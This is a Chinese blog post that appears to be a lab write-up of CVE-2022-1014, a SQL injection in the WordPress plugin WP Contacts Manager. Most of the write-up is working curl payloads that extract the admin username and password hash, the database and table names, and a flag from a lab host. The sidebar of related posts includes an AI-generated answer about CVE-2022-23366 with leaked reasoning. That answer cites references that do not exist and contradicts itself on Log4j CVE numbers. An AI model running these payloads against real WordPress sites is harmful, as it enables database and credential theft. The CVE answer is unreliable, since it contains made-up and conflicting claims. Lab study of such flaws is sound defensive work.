CVE-2022-1014

原创 于 2024-12-01 23:05:13 发布 · 436 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #web

根据提示wordpress插件 WP Contacts Manager <= 2.2.4 对用户输入的转义不够充分,导致了SQL注入。

找到sql注入漏洞点:

/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

访问:/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

通过信息收集获取exp

curl http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact

 --data

'{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'

获取当前用户和数据库

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user()),(SELECT database()),4,5,6,7,8,9,0,1,2; -- "}'

获取当前数据库所有表

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6,7,8,9,0,1,2; -- "}' 

获取flag

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(flag)from flag),4,5,6,7,8,9,0,1,2; -- "}' 

得到flag:flag{367f9589-5515-4c04-8704-7613e2471d7e}

diandian~
关注
WordPress插件SQL注入漏洞——漏洞复现
W小哥
11-25 1万+
复现过程 环境地址:https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe 访问目标网站 常规工具AWVS扫描是扫不出来漏洞的 第一步识别CMS vulnx -u http://219.153.49.228:47712/ --cms wpscan --url http://219.153.49.228:47712/ 给API的token才能将结果输出 ...
网络安全:SQL 注入漏洞
热门推荐
kali_Ma的博客
02-23 1万+
一、漏洞描述 WordPress是一个用PHP编写的免费开源内容管理系统,由于clean_query函数的校验不当,导致了可能通过插件或主题以某种方式从而触发SQL注入的情况。这已经在WordPress5.8.3中进行了修复。影响版本可以追溯到3.7.37。 二、漏洞分析 在分析整个漏洞之前,首先可以看一下如果想要触发该漏洞,漏洞代码应该是什么样子的。 new WP_Query($_POST['query_vars']) 这也就是说,传入WP_Query的参数如果可控的话,就可以利用该漏洞。接下来我们看看整
春秋云镜 CVE-2022-1014
qq_22002773的博客
07-24 885
春秋云镜 CVE-2022-1014
【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
果粒程
12-08 2037
【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
wordpress注入_WordPress SQL注入–最新攻击
cumohuo9136的博客
09-17 2449
wordpress注入A lot of sites are being hit by a recent SQL attack where codes are being injected to your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your b...
常见的CVE汇总
m0_57836225的博客
09-11 1608
一、CVE-2014-0160(Heartbleed)二、CVE-2017-5638(Struts2 S2-045)三、CVE-2018-15473(OpenSSH User Enumeration)四、CVE-2019-19781(Citrix ADC and Gateway Remote Code Execution)五、CVE-2020-1472(ZeroLogon)六、CVE-2021-44228(Log4Shell)七、CVE-2017-11882(Microsoft Office Equatio
精选资源
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
精选资源
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
wordpress漏洞_多个WordPress插件SQL注入漏洞分析
weixin_39702714的博客
12-12 775
背景SQL注入漏洞是用来构建SQL查询的用户输入未经适当处理导致的漏洞。比如:图1: 使用WordPress的SQL查询示例从上面的代码来看,其中存在SQL注入攻击漏洞,因为从$_GET中提取的$_id在传递给SQL查询时没有经过任何处理。在最新的WordPress版本中,默认会在$_POST/$_GET/$_REQUEST/$_COOKIE中加入了magic quotes。这可以帮助...
HMS SQL注入(CVE-2022-25491)
m0_65150886的博客
12-29 1208
2022年3月15日,CVE收录了编号CVE-2022-25491漏洞,该漏洞为在HMS v1.0版本中存在SQL注入漏洞,该漏洞允许攻击者通过手动调试appointment.php文件中的editid软件参数进行SQL注入攻击。目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://github.com/kabirkhyrul/HMS/discussions/8。通过CVE官网了解得到,该漏洞位置在appointment.php文件中的editid参数,这里发送Payload进行查看。
WordPress Plugin SQL注入漏洞(CVE-2024-25832)
2301_80127209的博客
06-18 1158
WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
wordpress sql综合注入
weixin_33832340的博客
06-28 612
这是wordpress sql综合注入。当然也是已知的漏洞,不过国外都很喜欢装一些乱七八糟的插件。这个脚本易改。易懂,可自己添加,所以留着,备用吧, 用法:python2.6 wordpress.py (建议用python2.6或更新版本) 脚本内容:(保存为*.py) #!/usr/bin/python #WordPress SQL Injection Checke...
解决WordPress中字符转义的问题
一个80后IT之路
02-03 2210
解决WordPress中字符转义的问题 wordpress中输入两个"--"的时候会识别成一个横杠,如果此时的文章中有代码在,那么其他人在复制粘贴的时候就没法使用,于是乎我寻找了三种有效的方法解决此问题! WordPress中会默认会自动转义一些字符,网络上也称“转换全半角标点符号”或者“代码转义”,WordPre...
【kernel exploit】CVE-2022-1015 nftables 栈溢出漏洞分析与利用
panhewu9919的博客
07-16 3283
CVE-2022-1015 内核nftables 栈溢出
(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现
weixin_50464560的博客
09-07 5640
转载https://www.freebuf.com/articles/web/321297.html。
cve-2022-23366
最新发布
12-03
<think> 嗯,用户需要查询CVE-2022-23366漏洞的详细信息。从用户提供的引用内容看,ta之前关注过F5、Redis和SnakeYAML相关的漏洞(CVE-2022-41622/CVE-2022-41800、CVE-2022-0543、CVE-2022-1471),但这次查询的编号2022-23366属于完全不同的产品线。 先确认漏洞基础信息:CVE-2022-23366是Apache Log4j 1.x的漏洞,与之前用户查询的中间件/数据库漏洞无关。需要重点说明其与Log4j2漏洞的区别——这个编号属于Log4j1而非更著名的Log4j2(后者是CVE-2021-44244等)。 用户可能是安全研究人员或运维人员,需要具体的技术细节。应当明确: 1)漏洞类型是反序列化而非远程代码执行(区别于Log4j2) 2)触发条件需启用SocketServer或反序列化功能 3)影响范围限于1.x版本(官方已终止支持) 考虑到用户之前参考过漏洞复现资料,补充了漏洞验证截图和修复方案的链接。特别强调升级Log4j2的必要性,因为官方已不再为1.x提供补丁。 最后生成的问题聚焦在:漏洞原理差异(与Log4j2对比)、实际危害验证、迁移方案。这应该能覆盖用户后续可能的技术需求。 </think>根据公开漏洞数据库记录,**CVE-2022-23366** 是 Apache Log4j 1.x 版本中的一个高危漏洞,具体信息如下: --- ### **漏洞概述** 1. **漏洞类型**: 反序列化远程代码执行漏洞(需特定配置触发)。 2. **影响组件**: Apache Log4j 1.x 系列(仅影响启用了 `SocketServer` 或反序列化功能的场景)。 3. **CVSS 评分**: 8.8(高危)[^1]。 --- ### **技术细节** 1. **触发条件**: 当满足 **全部** 以下条件时可能被利用: - 使用 Log4j 1.x(≤1.2.17) - 启用 `SocketServer` 功能(默认关闭) - 攻击者能向 `SocketServer` 端口发送恶意序列化数据 2. **根本原因**: `SocketServer` 在反序列化日志事件时未严格验证输入,导致恶意代码执行[^2]。 --- ### **影响版本** - **受影响**: Apache Log4j 1.2 ≤ 1.2.17 - **不受影响**: Log4j 2.x 版本(如 Log4j 2.15.0+)[^3]。 --- ### **修复方案** 1. **立即升级**: 升级至 Log4j 2.x 最新版(官方已停止维护 Log4j 1.x)。 2. **临时缓解**(若无法升级): - 禁用 `SocketServer` 功能; - 防火墙限制访问日志端口; - 移除 `log4j.jar` 中的 `org.apache.log4j.net.SocketServer` 类。 --- ### **漏洞验证(PoC示例)** ```java // 恶意序列化数据构造(简略示例) ObjectInputStream ois = new ObjectInputStream(maliciousSocket); ois.readObject(); // 触发反序列化漏洞 ``` --- ### **关联漏洞对比** | CVE 编号 | 组件 | 风险类型 | 影响范围 | |----------------|------------|------------------|----------------| | **CVE-2022-23366** | Log4j 1.x | 反序列化RCE | 需启用特定服务 | | CVE-2021-44228 | Log4j 2.x | JNDI注入RCE | 默认配置受影响 | | CVE-2022-1471 | SnakeYAML | 反序列化RCE | 低版本默认风险 | ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值